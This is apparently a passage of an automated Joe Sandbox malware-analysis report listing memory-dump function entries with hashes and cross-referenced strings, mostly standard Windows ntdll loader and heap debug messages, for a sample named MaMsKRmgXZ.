                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                      • API String ID: 0-523794902
                                                                                                                                      • Opcode ID: 4cc3a00641c1f8b380507a2c4d23a6165160ead0f002e695d79b6076ab6b6ca2
                                                                                                                                      • Instruction ID: 50196e88e5ce788249be6feaad86480c312b622dbcc7801b2df5855ec0b2816a
                                                                                                                                      • Opcode Fuzzy Hash: 4cc3a00641c1f8b380507a2c4d23a6165160ead0f002e695d79b6076ab6b6ca2
                                                                                                                                      • Instruction Fuzzy Hash: 3642FFB5215B81DFE304CF28C8D0B6ABBF6FF89644F0449ADE8859B251DB30DA45CB51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h. 4
                                                                                                                                      • API String ID: 0-841466353
                                                                                                                                      • Opcode ID: dbc369fffedf19040a0a1843bce05b40b22f78de0c62b65415401817ad591ffe
                                                                                                                                      • Instruction ID: 226bffa756e12048b65d1ce81b0cfca549eafb2bb1a24a1c139bd62f77236352
                                                                                                                                      • Opcode Fuzzy Hash: dbc369fffedf19040a0a1843bce05b40b22f78de0c62b65415401817ad591ffe
                                                                                                                                      • Instruction Fuzzy Hash: 41F139B6D11629EFDB55CF98C980ADEBBF9EF08650F50406AE501B7210EB709E41CFA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                      • API String ID: 0-122214566
                                                                                                                                      • Opcode ID: d0a8cf8b16fa91c92a95fe79090a5e2fcd7df41bdb07433371de38afaa5e4c6c
                                                                                                                                      • Instruction ID: 2508c2f6a881e6c46b35af385a1a7ce99ca0e3745d1e98327105317be5b6dca4
                                                                                                                                      • Opcode Fuzzy Hash: d0a8cf8b16fa91c92a95fe79090a5e2fcd7df41bdb07433371de38afaa5e4c6c
                                                                                                                                      • Instruction Fuzzy Hash: 64C14675A04B559FEB188B64CCD0BBF77A5EF45340F5482A9EC42AB290EB71D846C390
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 34251F82
                                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 34251F6F
                                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 34251FA9
                                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 34251F8A
                                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 34251F6A, 34251FA4, 34251FC4
                                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 34251FC9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                      • API String ID: 0-861424205
                                                                                                                                      • Opcode ID: a81b95351a98c38172e5663c72fdc8d0ef367ef9326ec3727915325ea69bc584
                                                                                                                                      • Instruction ID: bf4412158b6b113629e1819fdf727b46b9fd686137d93cdc7e2c4b5b5015bdc3
                                                                                                                                      • Opcode Fuzzy Hash: a81b95351a98c38172e5663c72fdc8d0ef367ef9326ec3727915325ea69bc584
                                                                                                                                      • Instruction Fuzzy Hash: E931F6B6F00365BBF7108A869C80F6BB7AC9B50694F01459DBA01B7254D7F0EE00CBE0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 34257FF0
                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 34257F8C, 34258000
                                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 34257F82, 34257FF6
                                                                                                                                      • LdrpInitializeProcess, xrefs: 3421C5E4
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 3421C5E3
                                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 34257F7B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                      • API String ID: 0-475462383
                                                                                                                                      • Opcode ID: 5f8921965e5857d0f55fb4ee1e6e4f1793164a7be8a3a44a16eb7a4e77ffbd52
                                                                                                                                      • Instruction ID: d2401f5ea8bd4cc838ea46287c580158c6cb901dd2b422229d53796da5284f9b
                                                                                                                                      • Opcode Fuzzy Hash: 5f8921965e5857d0f55fb4ee1e6e4f1793164a7be8a3a44a16eb7a4e77ffbd52
                                                                                                                                      • Instruction Fuzzy Hash: 693103B5A04746EFE314DF28DC85E2ABBD4EF95750F004598F886BB2A0D660DC05CBA2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                      • API String ID: 0-4253913091
                                                                                                                                      • Opcode ID: b4dd9975f6e224a9d0787e6f8fb5c650c20cb7182fd9415f84669f096575be6c
                                                                                                                                      • Instruction ID: 97d3c3bce246db15b1d296b110c26b0f601cc54ba8e7cd13b461d71520397a26
                                                                                                                                      • Opcode Fuzzy Hash: b4dd9975f6e224a9d0787e6f8fb5c650c20cb7182fd9415f84669f096575be6c
                                                                                                                                      • Instruction Fuzzy Hash: F6F1AD74B00A06DFE719CF68C894B6ABBB5FF44340F118299E555AB381DB71E982CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                      • API String ID: 3446177414-2283098728
                                                                                                                                      • Opcode ID: f593fbde525902ee7ac7a3341b67f736761c774f0db6866f37e094fbfa4e26b8
                                                                                                                                      • Instruction ID: 524c6ee39faba7941e3f62d63237228e7d3114c94ab95c1706a09b8614175a71
                                                                                                                                      • Opcode Fuzzy Hash: f593fbde525902ee7ac7a3341b67f736761c774f0db6866f37e094fbfa4e26b8
                                                                                                                                      • Instruction Fuzzy Hash: 0B51E1B57047029FE724DF3AC884B19B7E6BB85310F0486ADE452B72A1DB71A845CF92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 342580F3
                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 342580E2
                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 342580E9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 3446177414-1783798831
                                                                                                                                      • Opcode ID: a65722d60e83b6a55c88e667e53efc8b256575eb105147cbf8d6c7a0b408f8d0
                                                                                                                                      • Instruction ID: 16fb4ad655665826b0fe7ee5fc98ff0a5dbc7b067635c322c5448b50c280ff78
                                                                                                                                      • Opcode Fuzzy Hash: a65722d60e83b6a55c88e667e53efc8b256575eb105147cbf8d6c7a0b408f8d0
                                                                                                                                      • Instruction Fuzzy Hash: DE41C2B9910741EFE710EF69CC89B5BBBE9EB85650F00492AB858B3260DB74D801CF95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: ddcce05191e3d835882812bf7190b12c93aa918ab4d4553a99cb4184be1b56a2
                                                                                                                                      • Instruction ID: 40ea3684f5f48d5d3ec68f150b273dc60201ff21f28190e870d759c347a3a420
                                                                                                                                      • Opcode Fuzzy Hash: ddcce05191e3d835882812bf7190b12c93aa918ab4d4553a99cb4184be1b56a2
                                                                                                                                      • Instruction Fuzzy Hash: 28F1F676E006129FDF08CF68C99067DBFF6EF88280B56416DE4A6EB384D674E941CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                      • API String ID: 0-3061284088
                                                                                                                                      • Opcode ID: 3036a5d93eacae4301bda9b711b05dbe72028e6223438287c5d991401ac26d21
                                                                                                                                      • Instruction ID: 361c851354218121a450354ab41632acd55e073ade5ec22aa1c0abdc241e01ff
                                                                                                                                      • Opcode Fuzzy Hash: 3036a5d93eacae4301bda9b711b05dbe72028e6223438287c5d991401ac26d21
                                                                                                                                      • Instruction Fuzzy Hash: 67014CF7016D84DFF7099368D489F53BBA4DB43770F1540EFE046A7A928B95A840D950
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 341E0586
                                                                                                                                      • kLsE, xrefs: 341E05FE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                      • API String ID: 3446177414-2547482624
                                                                                                                                      • Opcode ID: 779909ca2301983b195842d7f1bfc065345c1522646a1c907f53e5ba5bae1eb1
                                                                                                                                      • Instruction ID: bbc0a41444dbd67a834f426cff3056bf8ac498ad1e4e9f197a8f78f43852e485
                                                                                                                                      • Opcode Fuzzy Hash: 779909ca2301983b195842d7f1bfc065345c1522646a1c907f53e5ba5bae1eb1
                                                                                                                                      • Instruction Fuzzy Hash: ED51AEB9A00F16DFEB14DFA4C4C06BABBF8AF46304F00847ED595A7240EB349585CBA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • .Local, xrefs: 342127F8
                                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 34251FE3, 342520BB
                                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 34251FE8
                                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 342520C0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                      • API String ID: 0-1239276146
                                                                                                                                      • Opcode ID: 094ff78a1c22dd4ca84b3bed43ea19c1abdec80ec199d84821fb76c4614ede7b
                                                                                                                                      • Instruction ID: e0d7777a1d3116575449a02903848103fd561fbaa2a77073a05ecaebb77a61ac
                                                                                                                                      • Opcode Fuzzy Hash: 094ff78a1c22dd4ca84b3bed43ea19c1abdec80ec199d84821fb76c4614ede7b
                                                                                                                                      • Instruction Fuzzy Hash: D7A18E75A0132A9FEB24CF64DC84B99B3B5BF58354F2101E9E808B7291D7719E81CFA4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                      • API String ID: 2994545307-2586055223
                                                                                                                                      • Opcode ID: c627652ebacdd4cd38b957b0098d6e842833499da02a2b00c4d603b5527c5325
                                                                                                                                      • Instruction ID: b2d5fb92f4377a3bf5b7a6e85f5e3b80e343f2b0d4419bd5bc1de5a108759fee
                                                                                                                                      • Opcode Fuzzy Hash: c627652ebacdd4cd38b957b0098d6e842833499da02a2b00c4d603b5527c5325
                                                                                                                                      • Instruction Fuzzy Hash: CB6141B1205B81DFE311CB24CC94F67B7E9EF85B90F050459F994AB291DB34E904CB62
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                      • API String ID: 2994545307-1391187441
                                                                                                                                      • Opcode ID: 0bf02f0f5a4bd1ceb7b183e90ac0154f23cf420fbf659a85d2fbfa8d628f5397
                                                                                                                                      • Instruction ID: 829e2eed3811b10b79524da48ecef812858e384ada8a7343f8ca4f364fda933c
                                                                                                                                      • Opcode Fuzzy Hash: 0bf02f0f5a4bd1ceb7b183e90ac0154f23cf420fbf659a85d2fbfa8d628f5397
                                                                                                                                      • Instruction Fuzzy Hash: 3931D4B6A11644EFDB01CF54CCC4FAABBB9EB467B0F104199F815AB292D730E940CE60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$e!4
                                                                                                                                      • API String ID: 0-1339849214
                                                                                                                                      • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                      • Instruction ID: 7c0d2daeedf589b9ebbd4c20a103d3c63ab2258e336fd4dbc30e8e4ba263803e
                                                                                                                                      • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                      • Instruction Fuzzy Hash: BE315E72900619FFEB51CB95CC44EAEBBBDEB84760F404125F514B7260EB31DA05DBA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                                                                                      • API String ID: 0-1880532218
                                                                                                                                      • Opcode ID: 26c88bb516d20db0d3c198a31e477b0a32b169721ff8528a56ade8777d1a43ae
                                                                                                                                      • Instruction ID: 8842392d82559b9d49d96c9344bed09adc13def6887358ff76051f9b29929f19
                                                                                                                                      • Opcode Fuzzy Hash: 26c88bb516d20db0d3c198a31e477b0a32b169721ff8528a56ade8777d1a43ae
                                                                                                                                      • Instruction Fuzzy Hash: 79212979A41601AFD7468B54DD91AAA73F5AF44748F0440AAE886B7341EB78ED41CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: 0c589cbbf7602398fccacd10ec37abd9f738d4097616af485c07dfa51b7cea80
                                                                                                                                      • Instruction ID: 25ab31e28cf7afdc08d6b03b3a717d8a033a54a0261e4154af06789c14ed6224
                                                                                                                                      • Opcode Fuzzy Hash: 0c589cbbf7602398fccacd10ec37abd9f738d4097616af485c07dfa51b7cea80
                                                                                                                                      • Instruction Fuzzy Hash: B9510139A00B06EFFB09DB65C8887BDB7B5FF44391F10416AE422A3290DB709951CB80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                      • API String ID: 0-1168191160
                                                                                                                                      • Opcode ID: 9bece7259ab03327fa8eebc6daf789b4389f2ce090ef90a06dcd78a254552d84
                                                                                                                                      • Instruction ID: 5ce1b7f75ff87b7b7e9f187c6b60117ac7ce0c5add66b6159f54765f5b307c79
                                                                                                                                      • Opcode Fuzzy Hash: 9bece7259ab03327fa8eebc6daf789b4389f2ce090ef90a06dcd78a254552d84
                                                                                                                                      • Instruction Fuzzy Hash: 25F16DB5A00229CBDB20CF14CC90BD9BBB5EF44754F4481E9E609B7242EB359E85CF59
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • RTL: Re-Waiting, xrefs: 34250128
                                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 342500C7
                                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 342500F1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                      • API String ID: 0-2474120054
                                                                                                                                      • Opcode ID: 8bbfd93967b79b8e3611073148378e4acbfab09a7876a97aef6036e13b90e632
                                                                                                                                      • Instruction ID: 0c18cd6cf9afb804b6139332c4c83ba950c5b07fc688af8fce1440289f932bb6
                                                                                                                                      • Opcode Fuzzy Hash: 8bbfd93967b79b8e3611073148378e4acbfab09a7876a97aef6036e13b90e632
                                                                                                                                      • Instruction Fuzzy Hash: 45E1C174608742DFE311CF28C880B1AB7E5BF84354F118A5DF565AB2E1DBB4E944CB52
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
